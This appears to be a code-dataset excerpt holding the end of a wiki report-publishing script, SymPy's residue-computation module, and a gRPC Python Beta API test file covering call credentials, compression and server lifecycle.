    output = header + rows_wiki + footer
    # print(output)
    #fetch a CSRF token and publish the finished report to the wiki page
    edit_token = get_token(auth1)
    edit_sum = "Popular articles from {date7} to {date1}".format(**header_dates)
    publish_report(output, edit_sum, auth1, edit_token)
| mit |
jerli/sympy | sympy/series/residues.py | 84 | 2386 | """
This module implements the Residue function and related tools for working
with residues.
"""
from __future__ import print_function, division
from sympy import sympify
from sympy.utilities.timeutils import timethis
@timethis('residue')
def residue(expr, x, x0):
    """
    Finds the residue of ``expr`` at the point x=x0.

    The residue is defined as the coefficient of 1/(x-x0) in the power series
    expansion about x=x0.

    Examples
    ========

    >>> from sympy import Symbol, residue, sin
    >>> x = Symbol("x")
    >>> residue(1/x, x, 0)
    1
    >>> residue(1/x**2, x, 0)
    0
    >>> residue(2/sin(x), x, 0)
    2

    This function is essential for the Residue Theorem [1].

    References
    ==========

    1. http://en.wikipedia.org/wiki/Residue_theorem
    """
    # The current implementation uses series expansion to
    # calculate it. A more general implementation is explained in
    # the section 5.6 of the Bronstein's book {M. Bronstein:
    # Symbolic Integration I, Springer Verlag (2005)}. For purely
    # rational functions, the algorithm is much easier. See
    # sections 2.4, 2.5, and 2.7 (this section actually gives an
    # algorithm for computing any Laurent series coefficient for
    # a rational function). The theory in section 2.4 will help to
    # understand why the resultant works in the general algorithm.
    # For the definition of a resultant, see section 1.4 (and any
    # previous sections for more review).
    from sympy import collect, Mul, Order, S
    expr = sympify(expr)
    if x0 != 0:
        # Shift the expansion point to the origin so that everything below
        # only ever expands about x=0.
        expr = expr.subs(x, x + x0)
    # Try successively higher series orders until the expansion captures all
    # negative-degree terms, i.e. until the series either has no Order term
    # or its Order exponent is non-negative.
    for n in [0, 1, 2, 4, 8, 16, 32]:
        if n == 0:
            s = expr.series(x, n=0)
        else:
            s = expr.nseries(x, n=n)
        if s.has(Order) and s.removeO() == 0:
            # bug in nseries: the expansion collapsed to only an Order term;
            # retry with a larger n
            continue
        if not s.has(Order) or s.getn() >= 0:
            break
    if s.has(Order) and s.getn() < 0:
        raise NotImplementedError('Bug in nseries?')
    # Collect powers of x so each additive term carries a single power of x,
    # then pick out the coefficient of x**-1: that is the residue (after the
    # shift to the origin above).
    s = collect(s.removeO(), x)
    if s.is_Add:
        args = s.args
    else:
        args = [s]
    res = S(0)
    for arg in args:
        c, m = arg.as_coeff_mul(x)
        m = Mul(*m)
        if not (m == 1 or m == x or (m.is_Pow and m.exp.is_Integer)):
            raise NotImplementedError('term of unexpected form: %s' % m)
        if m == 1/x:
            res += c
    return res
| bsd-3-clause |
chrisdunelm/grpc | src/python/grpcio_tests/tests/unit/beta/_beta_features_test.py | 13 | 13790 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests Face interface compliance of the gRPC Python Beta API."""
import threading
import unittest
from grpc.beta import implementations
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities
from tests.unit import resources
from tests.unit.beta import test_utilities
from tests.unit.framework.common import test_constants
# Host name presented for TLS verification in place of 'localhost';
# presumably matches the test certificates in resources -- confirm there.
_SERVER_HOST_OVERRIDE = 'foo.test.google.fr'
# Metadata pair injected by the per-RPC call-credentials plugin; the tests
# assert that it reaches the servicer's invocation metadata.
_PER_RPC_CREDENTIALS_METADATA_KEY = b'my-call-credentials-metadata-key'
_PER_RPC_CREDENTIALS_METADATA_VALUE = b'my-call-credentials-metadata-value'
# Service group and per-cardinality method names used to register and invoke
# the four test RPCs.
_GROUP = 'group'
_UNARY_UNARY = 'unary-unary'
_UNARY_STREAM = 'unary-stream'
_STREAM_UNARY = 'stream-unary'
_STREAM_STREAM = 'stream-stream'
# Canned request and response payloads.
_REQUEST = b'abc'
_RESPONSE = b'123'
class _Servicer(object):
    """Recording servicer with one handler per RPC cardinality.

    Each handler records the request, the calling peer, and the invocation
    metadata under a condition variable, disables compression for its next
    response, and marks itself serviced so tests can block until the RPC has
    actually executed on the server side.
    """

    def __init__(self):
        self._condition = threading.Condition()
        self._peer = None
        self._serviced = False

    def unary_unary(self, request, context):
        # Record everything about the call, then answer with the canned
        # response.
        with self._condition:
            self._request = request
            self._peer = context.protocol_context().peer()
            self._invocation_metadata = context.invocation_metadata()
            context.protocol_context().disable_next_response_compression()
            self._serviced = True
            self._condition.notify_all()
            return _RESPONSE

    def unary_stream(self, request, context):
        with self._condition:
            self._request = request
            self._peer = context.protocol_context().peer()
            self._invocation_metadata = context.invocation_metadata()
            context.protocol_context().disable_next_response_compression()
            self._serviced = True
            self._condition.notify_all()
            # Empty response stream: the bare return ends the generator; the
            # unreachable yield below only serves to make this a generator
            # function.
            return
            yield  # pylint: disable=unreachable

    def stream_unary(self, request_iterator, context):
        # Drain the request stream, keeping only the last request.
        # NOTE(review): self._request is written outside the condition lock
        # here, unlike the other handlers -- presumably fine for these
        # single-request tests, but confirm if reused.
        for request in request_iterator:
            self._request = request
        with self._condition:
            self._peer = context.protocol_context().peer()
            self._invocation_metadata = context.invocation_metadata()
            context.protocol_context().disable_next_response_compression()
            self._serviced = True
            self._condition.notify_all()
            return _RESPONSE

    def stream_stream(self, request_iterator, context):
        # Echo one canned response per request, disabling compression for
        # each response as it goes out.
        for request in request_iterator:
            with self._condition:
                self._peer = context.protocol_context().peer()
                context.protocol_context().disable_next_response_compression()
                yield _RESPONSE
        # Only after the request stream ends is the call marked serviced.
        with self._condition:
            self._invocation_metadata = context.invocation_metadata()
            self._serviced = True
            self._condition.notify_all()

    def peer(self):
        """Return the peer recorded from the most recent RPC (or None)."""
        with self._condition:
            return self._peer

    def block_until_serviced(self):
        """Block the caller until some handler has completed its recording."""
        with self._condition:
            while not self._serviced:
                self._condition.wait()
class _BlockingIterator(object):
def __init__(self, upstream):
self._condition = threading.Condition()
self._upstream = upstream
self._allowed = []
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
with self._condition:
while True:
if self._allowed is None:
raise StopIteration()
elif self._allowed:
return self._allowed.pop(0)
else:
self._condition.wait()
def allow(self):
with self._condition:
try:
self._allowed.append(next(self._upstream))
except StopIteration:
self._allowed = None
self._condition.notify_all()
def _metadata_plugin(context, callback):
    """Call-credentials plugin: hand the canned metadata pair to the
    callback with no error."""
    metadata = [(_PER_RPC_CREDENTIALS_METADATA_KEY,
                 _PER_RPC_CREDENTIALS_METADATA_VALUE)]
    callback(metadata, None)
class BetaFeaturesTest(unittest.TestCase):
    """End-to-end tests for Beta API features over real secure RPCs.

    Exercises per-RPC call credentials (a metadata plugin), per-call and
    per-message compression disabling, and peer identification across all
    four RPC cardinalities.
    """

    def setUp(self):
        # Stand up a secure server exposing one method per cardinality, all
        # backed by the shared recording servicer, plus a dynamic stub
        # connected to it over an SSL channel.
        self._servicer = _Servicer()
        method_implementations = {
            (_GROUP, _UNARY_UNARY):
                utilities.unary_unary_inline(self._servicer.unary_unary),
            (_GROUP, _UNARY_STREAM):
                utilities.unary_stream_inline(self._servicer.unary_stream),
            (_GROUP, _STREAM_UNARY):
                utilities.stream_unary_inline(self._servicer.stream_unary),
            (_GROUP, _STREAM_STREAM):
                utilities.stream_stream_inline(self._servicer.stream_stream),
        }
        cardinalities = {
            _UNARY_UNARY: cardinality.Cardinality.UNARY_UNARY,
            _UNARY_STREAM: cardinality.Cardinality.UNARY_STREAM,
            _STREAM_UNARY: cardinality.Cardinality.STREAM_UNARY,
            _STREAM_STREAM: cardinality.Cardinality.STREAM_STREAM,
        }
        server_options = implementations.server_options(
            thread_pool_size=test_constants.POOL_SIZE)
        self._server = implementations.server(
            method_implementations, options=server_options)
        server_credentials = implementations.ssl_server_credentials([
            (
                resources.private_key(),
                resources.certificate_chain(),
            ),
        ])
        # Port 0 lets the OS pick a free port; the chosen port is returned.
        port = self._server.add_secure_port('[::]:0', server_credentials)
        self._server.start()
        self._channel_credentials = implementations.ssl_channel_credentials(
            resources.test_root_certificates())
        self._call_credentials = implementations.metadata_call_credentials(
            _metadata_plugin)
        channel = test_utilities.not_really_secure_channel(
            'localhost', port, self._channel_credentials, _SERVER_HOST_OVERRIDE)
        stub_options = implementations.stub_options(
            thread_pool_size=test_constants.POOL_SIZE)
        self._dynamic_stub = implementations.dynamic_stub(
            channel, _GROUP, cardinalities, options=stub_options)

    def tearDown(self):
        # Drop the stub first, then stop the server and wait for shutdown.
        self._dynamic_stub = None
        self._server.stop(test_constants.SHORT_TIMEOUT).wait()

    def test_unary_unary(self):
        """Unary-unary RPC delivers call-credentials metadata and succeeds
        with compression disabled."""
        call_options = interfaces.grpc_call_options(
            disable_compression=True, credentials=self._call_credentials)
        response = getattr(self._dynamic_stub, _UNARY_UNARY)(
            _REQUEST,
            test_constants.LONG_TIMEOUT,
            protocol_options=call_options)
        self.assertEqual(_RESPONSE, response)
        self.assertIsNotNone(self._servicer.peer())
        # The metadata injected by the call-credentials plugin must have
        # reached the servicer.
        invocation_metadata = [
            (metadatum.key, metadatum.value)
            for metadatum in self._servicer._invocation_metadata
        ]
        self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
                       _PER_RPC_CREDENTIALS_METADATA_VALUE),
                      invocation_metadata)

    def test_unary_stream(self):
        """Unary-stream RPC delivers call-credentials metadata; the empty
        response stream is not consumed, so we block until serviced."""
        call_options = interfaces.grpc_call_options(
            disable_compression=True, credentials=self._call_credentials)
        response_iterator = getattr(self._dynamic_stub, _UNARY_STREAM)(
            _REQUEST,
            test_constants.LONG_TIMEOUT,
            protocol_options=call_options)
        self._servicer.block_until_serviced()
        self.assertIsNotNone(self._servicer.peer())
        invocation_metadata = [
            (metadatum.key, metadatum.value)
            for metadatum in self._servicer._invocation_metadata
        ]
        self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
                       _PER_RPC_CREDENTIALS_METADATA_VALUE),
                      invocation_metadata)

    def test_stream_unary(self):
        """Stream-unary RPC supports disabling compression per request
        message while carrying call credentials."""
        call_options = interfaces.grpc_call_options(
            credentials=self._call_credentials)
        request_iterator = _BlockingIterator(iter((_REQUEST,)))
        response_future = getattr(self._dynamic_stub, _STREAM_UNARY).future(
            request_iterator,
            test_constants.LONG_TIMEOUT,
            protocol_options=call_options)
        # Disable compression before releasing each request message; the
        # second allow() releases the end-of-stream.
        response_future.protocol_context().disable_next_request_compression()
        request_iterator.allow()
        response_future.protocol_context().disable_next_request_compression()
        request_iterator.allow()
        self._servicer.block_until_serviced()
        self.assertIsNotNone(self._servicer.peer())
        self.assertEqual(_RESPONSE, response_future.result())
        invocation_metadata = [
            (metadatum.key, metadatum.value)
            for metadatum in self._servicer._invocation_metadata
        ]
        self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
                       _PER_RPC_CREDENTIALS_METADATA_VALUE),
                      invocation_metadata)

    def test_stream_stream(self):
        """Stream-stream RPC interleaves per-message compression control
        with request/response exchange."""
        call_options = interfaces.grpc_call_options(
            credentials=self._call_credentials)
        request_iterator = _BlockingIterator(iter((_REQUEST,)))
        response_iterator = getattr(self._dynamic_stub, _STREAM_STREAM)(
            request_iterator,
            test_constants.SHORT_TIMEOUT,
            protocol_options=call_options)
        # Disable compression, release a request, and read its response;
        # then release end-of-stream and wait for the servicer to finish.
        response_iterator.protocol_context().disable_next_request_compression()
        request_iterator.allow()
        response = next(response_iterator)
        response_iterator.protocol_context().disable_next_request_compression()
        request_iterator.allow()
        self._servicer.block_until_serviced()
        self.assertIsNotNone(self._servicer.peer())
        self.assertEqual(_RESPONSE, response)
        invocation_metadata = [
            (metadatum.key, metadatum.value)
            for metadatum in self._servicer._invocation_metadata
        ]
        self.assertIn((_PER_RPC_CREDENTIALS_METADATA_KEY,
                       _PER_RPC_CREDENTIALS_METADATA_VALUE),
                      invocation_metadata)
class ContextManagementAndLifecycleTest(unittest.TestCase):
    """Verifies stub context-manager behavior and repeated server
    start/stop lifecycles."""

    def setUp(self):
        # Shared fixtures only; servers and channels are created per-test so
        # that each test controls the lifecycle under scrutiny.
        self._servicer = _Servicer()
        self._method_implementations = {
            (_GROUP, _UNARY_UNARY):
                utilities.unary_unary_inline(self._servicer.unary_unary),
            (_GROUP, _UNARY_STREAM):
                utilities.unary_stream_inline(self._servicer.unary_stream),
            (_GROUP, _STREAM_UNARY):
                utilities.stream_unary_inline(self._servicer.stream_unary),
            (_GROUP, _STREAM_STREAM):
                utilities.stream_stream_inline(self._servicer.stream_stream),
        }
        self._cardinalities = {
            _UNARY_UNARY: cardinality.Cardinality.UNARY_UNARY,
            _UNARY_STREAM: cardinality.Cardinality.UNARY_STREAM,
            _STREAM_UNARY: cardinality.Cardinality.STREAM_UNARY,
            _STREAM_STREAM: cardinality.Cardinality.STREAM_STREAM,
        }
        self._server_options = implementations.server_options(
            thread_pool_size=test_constants.POOL_SIZE)
        self._server_credentials = implementations.ssl_server_credentials([
            (
                resources.private_key(),
                resources.certificate_chain(),
            ),
        ])
        self._channel_credentials = implementations.ssl_channel_credentials(
            resources.test_root_certificates())
        self._stub_options = implementations.stub_options(
            thread_pool_size=test_constants.POOL_SIZE)

    def test_stub_context(self):
        """A dynamic stub can be entered/exited repeatedly and still make
        working RPCs inside its context."""
        server = implementations.server(
            self._method_implementations, options=self._server_options)
        port = server.add_secure_port('[::]:0', self._server_credentials)
        server.start()
        channel = test_utilities.not_really_secure_channel(
            'localhost', port, self._channel_credentials, _SERVER_HOST_OVERRIDE)
        dynamic_stub = implementations.dynamic_stub(
            channel, _GROUP, self._cardinalities, options=self._stub_options)
        # Entering and exiting the stub context many times must be harmless.
        for _ in range(100):
            with dynamic_stub:
                pass
        # The stub must remain fully functional for RPCs inside the context.
        for _ in range(10):
            with dynamic_stub:
                call_options = interfaces.grpc_call_options(
                    disable_compression=True)
                response = getattr(dynamic_stub, _UNARY_UNARY)(
                    _REQUEST,
                    test_constants.LONG_TIMEOUT,
                    protocol_options=call_options)
                self.assertEqual(_RESPONSE, response)
                self.assertIsNotNone(self._servicer.peer())
        server.stop(test_constants.SHORT_TIMEOUT).wait()

    def test_server_lifecycle(self):
        """Servers survive many start/stop cycles, and stop() is safe to
        call redundantly, inside and outside the server context."""
        for _ in range(100):
            server = implementations.server(
                self._method_implementations, options=self._server_options)
            port = server.add_secure_port('[::]:0', self._server_credentials)
            server.start()
            server.stop(test_constants.SHORT_TIMEOUT).wait()
        for _ in range(100):
            server = implementations.server(
                self._method_implementations, options=self._server_options)
            server.add_secure_port('[::]:0', self._server_credentials)
            server.add_insecure_port('[::]:0')
            with server:
                # Stopping inside the context and again afterwards must both
                # be safe (idempotent stop).
                server.stop(test_constants.SHORT_TIMEOUT)
            server.stop(test_constants.SHORT_TIMEOUT)
if __name__ == '__main__':
    # Allow running this test module directly; verbosity=2 prints each
    # test's name as it runs.
    unittest.main(verbosity=2)
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.